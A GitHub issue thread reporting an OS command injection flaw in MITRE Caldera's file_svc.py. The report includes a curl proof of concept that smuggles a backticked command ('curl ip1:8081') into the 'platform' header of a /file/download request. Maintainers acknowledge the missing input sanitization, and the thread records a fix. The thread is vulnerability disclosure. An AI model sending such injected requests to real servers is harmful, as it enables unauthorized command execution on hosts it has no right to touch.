### ISSUE TITLE
OS Command Injection  in file_svc.py

### ISSUE THREAD

**Issue by 1c3z** [mitre/caldera#461]
run the caldera

```
python3 server.py
```

```
curl -sk -X POST -H 'file:sandcat.go' -H 'platform:`curl ip1:8081`' http://ip2:8888/file/download   
```
![image](https://user-images.githubusercontent.com/9052484/64105129-2aeebe80-cda8-11e9-8f9f-9d2c38392271.png)

![image](https://user-images.githubusercontent.com/9052484/64105137-317d3600-cda8-11e9-95ae-f7fd96236070.png)

**Comment by khyberspache** [comment]
We clearly aren't sanitizing inputs properly, so I imagine there are more of these around.  Keep posting if you find them - great work!

**Comment by privateducky** [comment]
this appears fixed - thanks @ajunlee
